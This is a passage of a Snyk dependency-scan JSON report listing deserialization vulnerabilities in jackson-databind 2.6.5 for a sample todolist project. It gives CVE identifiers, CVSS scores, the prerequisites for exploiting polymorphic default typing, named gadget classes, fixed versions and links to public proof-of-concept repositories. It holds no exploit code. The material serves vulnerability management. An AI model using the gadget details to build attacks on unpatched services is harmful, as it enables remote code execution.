"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:52:13.712421Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:53:53.918541Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:55:58.282653Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:52:13.712421Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:53.918541Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. When Default Typing is enabled for an externally exposed JSON endpoint and the service has the apache-log4j-extra (version 1.2.x) jar in the classpath, and an attacker can provide a JNDI service to access, it is possible to make the service execute a malicious payload.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.1 or higher.\n## References\n- [Blog Post](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/b5a304a98590b6bb766134f9261e6566dcbbb6d0)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2498)\n", - "epssDetails": { - "percentile": "0.80301", - "probability": "0.00690", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2019-17531" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-gjmw-vf9h-g25v" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2019-10-13T07:40:03.046000Z", - "functions_new": [ - { - "version": [ - "[2.0.0, 2.9.10.1)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2019-10-12T21:52:10Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2019-10-13T07:41:55Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:53.918541Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-540500", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "UltramanGaia" - ], - "semver": { - "vulnerable": [ - "[,2.9.10.2)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.9.10.2" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[2.0,2.9.10.2)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/fc4214a883dc087070f25da738ef0d49c2f3387e", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2526", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:52:13.692398Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:53:53.922905Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:55:49.242419Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:52:13.692398Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:53.922905Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. Two additional `net.sf.ehcache` gadgets are not blacklisted.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.2 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/fc4214a883dc087070f25da738ef0d49c2f3387e)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2526)\n", - "epssDetails": { - "percentile": "0.79103", - "probability": "0.00622", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2019-20330" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-01-03T10:26:22.562970Z", - "functions_new": [ - { - "version": [ - "[2.0,2.9.10.2)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-01-03T05:14:08Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-01-03T05:14:08Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:53.922905Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-548451", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.4)", - "[2.7.0,2.7.9.7)", - "[2.8.0,2.8.11.5)", - "[2.9.0,2.9.10.3)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.6.7.4", - "2.7.9.7", - "2.8.11.5", - "2.9.10.3" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.8.11.5)", - "[2.9.0,2.9.10.3)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/914e7c9f2cb8ce66724bf26a72adc7e958992497", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2620", - "title": "GitHub Issue" - }, - { - "url": "https://github.com/jas502n/jackson-CVE-2020-8840", - "title": "Jackson PoC" - }, - { - "url": "https://github.com/jas502n/CVE-2020-8840", - "title": "PoC" - }, - { - "url": "https://github.com/Veraxy01/CVE-2020-8840", - "title": "PoC" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:50:01.209202Z" - }, - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:51:13.031834Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:56:13.011056Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:50:01.209202Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:13.031834Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data due to an incomplete black list (incomplete fix for [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507)). \r\nIt lacks `xbean-reflect/JNDI` blocking, as demonstrated by `org.apache.xbean.propertyeditor.JndiConverter`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.7.9.7, 2.8.11.5, 2.9.10.3 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/914e7c9f2cb8ce66724bf26a72adc7e958992497)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2620)\n- [Jackson PoC](https://github.com/jas502n/jackson-CVE-2020-8840)\n- [PoC](https://github.com/jas502n/CVE-2020-8840)\n- [PoC](https://github.com/Veraxy01/CVE-2020-8840)\n", - "epssDetails": { - "percentile": "0.91001", - "probability": "0.03042", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-8840" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-02-11T07:57:04.144993Z", - "functions_new": [ - { - "version": [ - "[,2.8.11.5)", - "[2.9.0,2.9.10.3)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-02-09T21:12:38Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-02-11T21:12:38Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:13.031834Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-559094", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.4)", - "[2.7.0,2.7.9.7)", - "[2.8.0,2.8.11.6)", - "[2.9.0,2.9.10.4)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.6.7.4", - "2.7.9.7", - "2.8.11.6", - "2.9.10.4" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.6.7.3)", - "[2.8.0,2.8.11.5)", - "[2.9.0,2.9.10.3)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/9f4e97019fb0dd836533d0b6198c88787e235ae2", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2634", - "title": "Github Issue #1" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2631", - "title": "GitHub Issue #2" - }, - { - "url": "https://github.com/fairyming/CVE-2020-9548", - "title": "GitHub PoC" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:51:19.015843Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:53:54.132894Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:59.016713Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:19.015843Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:54.132894Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. Mishandles the interaction between serialization gadgets and typing, related to:\r\n\r\n* `com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig` (aka `ibatis-sqlmap`)\r\n* `br.com.anteros.dbcp.AnterosDBCPConfig` (aka `anteros-core`)\r\n* `org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig` (aka shaded `hikari-config`)\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.7.9.7, 2.8.11.6, 2.9.10.4 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/9f4e97019fb0dd836533d0b6198c88787e235ae2)\n- [Github Issue #1](https://github.com/FasterXML/jackson-databind/issues/2634)\n- [GitHub Issue #2](https://github.com/FasterXML/jackson-databind/issues/2631)\n- [GitHub PoC](https://github.com/fairyming/CVE-2020-9548)\n", - "epssDetails": { - "percentile": "0.79604", - "probability": "0.00652", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-9546", - "CVE-2020-9547", - "CVE-2020-9548" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-5p34-5m6p-p58g", - "GHSA-p43x-xfjf-5jhr", - "GHSA-q93h-jc49-78gg" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-03-02T10:29:31.222015Z", - "functions_new": [ - { - "version": [ - "[,2.6.7.3)", - "[2.8.0,2.8.11.5)", - "[2.9.0,2.9.10.3)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-03-02T05:18:36Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-03-02T05:18:36Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:54.132894Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-559106", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", - "credit": [ - "Pedro Sampaio" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.3)", - "[2.8.0,2.8.11.5)", - "[2.9.0,2.9.10.3)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.6.7.3", - "2.8.11.5", - "2.9.10.3" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.6.7.3)", - "[2.8.0,2.8.11.5)", - "[2.9.0,2.9.10.3)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/41b7f9b90149e9d44a65a8261a8deedc7186f6af", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2462", - "title": "GitHub Issue" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2469", - "title": "GitHub Issue" - }, - { - "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-14892", - "title": "RedHat Bugzilla" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:47:48.813035Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:53:54.500842Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:59.772859Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:47:48.813035Z" - }, - { - "type": "secondary", - "vector": 